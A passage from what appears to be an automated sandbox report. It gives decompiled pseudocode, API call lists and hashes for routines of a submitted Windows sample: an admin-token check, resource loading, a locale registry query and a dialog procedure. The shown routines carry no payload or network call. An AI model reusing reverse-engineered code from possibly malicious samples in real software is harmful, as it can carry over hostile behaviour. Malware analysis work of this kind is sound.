                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe78128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e718fa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71912
                                                                                                                                                                                                      0x00e719aa
                                                                                                                                                                                                      0x00e719ad
                                                                                                                                                                                                      0x00e719b3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71927
                                                                                                                                                                                                      0x00e71927
                                                                                                                                                                                                      0x00e71932
                                                                                                                                                                                                      0x00e71936
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00e7194c
                                                                                                                                                                                                      0x00e719a2
                                                                                                                                                                                                      0x00e719a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7196e
                                                                                                                                                                                                      0x00e71970
                                                                                                                                                                                                      0x00e71999
                                                                                                                                                                                                      0x00e7199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7199c
                                                                                                                                                                                                      0x00e71972
                                                                                                                                                                                                      0x00e71972
                                                                                                                                                                                                      0x00e71975
                                                                                                                                                                                                      0x00e71984
                                                                                                                                                                                                      0x00e71985
                                                                                                                                                                                                      0x00e7198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7198c
                                                                                                                                                                                                      0x00e71991
                                                                                                                                                                                                      0x00e71996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71996
                                                                                                                                                                                                      0x00e7194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E718DD), ref: 00E7181A
                                                                                                                                                                                                        • Part of subcall function 00E717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E7182C
                                                                                                                                                                                                        • Part of subcall function 00E717EE: AllocateAndInitializeSid.ADVAPI32(00E718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E718DD), ref: 00E71855
                                                                                                                                                                                                        • Part of subcall function 00E717EE: FreeSid.ADVAPI32(?,?,?,?,00E718DD), ref: 00E71883
                                                                                                                                                                                                        • Part of subcall function 00E717EE: FreeLibrary.KERNEL32(00000000,?,?,?,00E718DD), ref: 00E7188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00E718EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E718F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00E7190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00E71918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00E7192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00E71944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E71964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00E7197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00E7199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E719A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E719AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: c5747d213930e95129d214a950f27a1a021bf97732dda3cc400747b09e845de7
                                                                                                                                                                                                      • Instruction ID: b165ed733cb3900f0f5eab2d62ad43475d5a233a254a598f69f64502670862d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5747d213930e95129d214a950f27a1a021bf97732dda3cc400747b09e845de7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99313071A00209AFDB20DFAADC58ABFBBBDFF84704F145465E649F2150D730994ACB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E7468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: d43b3531486823579e79ec83b207f1517a3fcf2adef58f7efb29beb9d66e162b
                                                                                                                                                                                                      • Instruction ID: 368e01a0bb961dd0bba59b80fcd158b8cb4b7f1e4f8aa44b102e1a163ff3b779
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d43b3531486823579e79ec83b207f1517a3fcf2adef58f7efb29beb9d66e162b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B40186772442107FE31067E69C4DF7F7E2CEBC6B52F084424FA4DB6191DB71888586A6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E7681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xe781d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xe781d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xe781d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xe71140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E00E766F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xe781d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t18 =  &_v8; // 0xe7463b
                                                                                                                                                                                                      				return E00E76CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E7686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00E768A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E768CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,?,0000000C), ref: 00E768F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E76902
                                                                                                                                                                                                        • Part of subcall function 00E766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00E7691A), ref: 00E76741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: ;F$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-574545411
                                                                                                                                                                                                      • Opcode ID: 8098f3f6120a72c205cdeb55fe5280bc270ccdfc32ff7bf80a16caa50919ec1b
                                                                                                                                                                                                      • Instruction ID: 7ea855a4a30f2d42c6a356f8bf42863f23ff720780ce055414594d90cf2b4e9e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8098f3f6120a72c205cdeb55fe5280bc270ccdfc32ff7bf80a16caa50919ec1b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8318F31A017189FDB21CB16DC04BAAB7B9EB8572CF0481A5EA4DB6150DB309E89CF52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E00E743D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xe79404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe791dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E73490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E7349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E734B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00E734C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00E734CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00E734D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: 23e47f3ffb43eafb2d900c825a20b6d38fcab08670738b09f43f36cce623fdcc
                                                                                                                                                                                                      • Instruction ID: 79dfbd5ff48b550809ed8ef0668bc9539c6f44f0ab2c2d1da21c35d96a8ce02e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e47f3ffb43eafb2d900c825a20b6d38fcab08670738b09f43f36cce623fdcc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D701D231251115AFD75E9F76DC0C8AD3B60EB45702F54D020FA6EB69A0E7318F81EB85
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E72AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xe79a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E71680(_t65, E00E717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E00E765E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E00E71680(_t65, E00E717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00E72AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00E72AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00E72B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 00E72B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 00E72B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00E72BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: e31eb103858e26884bfca8b2bd9da61df0753115bfbd30903e919313a0792ce0
                                                                                                                                                                                                      • Instruction ID: 1a07ffb1b10bd9cf9b87ed3c406d278cf0371571ca9d10f7ba27111f72c7f131
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e31eb103858e26884bfca8b2bd9da61df0753115bfbd30903e919313a0792ce0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC4127345082855FDB159F34DC54AFD7BA99F92304F0890EED8CAB7202DB354E8ACB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
